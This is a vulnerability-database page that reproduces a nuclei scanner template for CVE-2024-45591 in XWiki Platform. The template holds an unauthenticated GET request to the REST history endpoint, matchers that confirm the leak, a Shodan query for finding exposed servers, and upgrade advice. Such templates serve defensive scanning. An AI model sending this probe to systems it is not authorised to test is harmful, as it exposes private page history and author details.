Lucene search
K

XWiki Platform - Unauthorized Document History Access

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

Unauthorized access to document history in XWiki Platform via REST API vulnerable endpoints.

Related
Refs
Code
id: CVE-2024-45591

info:
  name: XWiki Platform - Unauthorized Document History Access
  author: pd-bot
  severity: medium
  description: |
    A vulnerability in XWiki Platform's REST API allows unauthorized users to access document history information. The REST API endpoint exposes the history of any page including modification times, version numbers, author details (username and display name), and version comments, regardless of access rights configuration, even on private wikis.
  impact: |
    An attacker can access document history of any known page
  remediation: |
    Upgrade to XWiki Platform version 15.10.9 or 16.3.0-rc-1 or later. No workarounds are available for earlier versions
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm
    - https://jira.xwiki.org/browse/XWIKI-22052
    - https://nvd.nist.gov/vuln/detail/cve-2024-45591
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-45591
    cwe-id: CWE-359,CWE-862
    epss-score: 0.03417
    epss-percentile: 0.87459
    cpe: cpe:2.3:a:xwiki:platform:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: xwiki
    product: xwiki-platform
    shodan-query: http.html:"data-xwiki-reference"
  tags: cve,cve2024,xwiki,exposure,rest-api,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'version'
          - 'historySummary'
          - 'pageId'
          - 'comment'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402204a56d01f90b64d2290ce4157125e4ec51a7a09a50387b555f6b1309aee74c83802202e09b9e5d5bc1534650a7ad676536902995e973f189ad90d3b8441870a7c1fca:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.03417
SSVC
33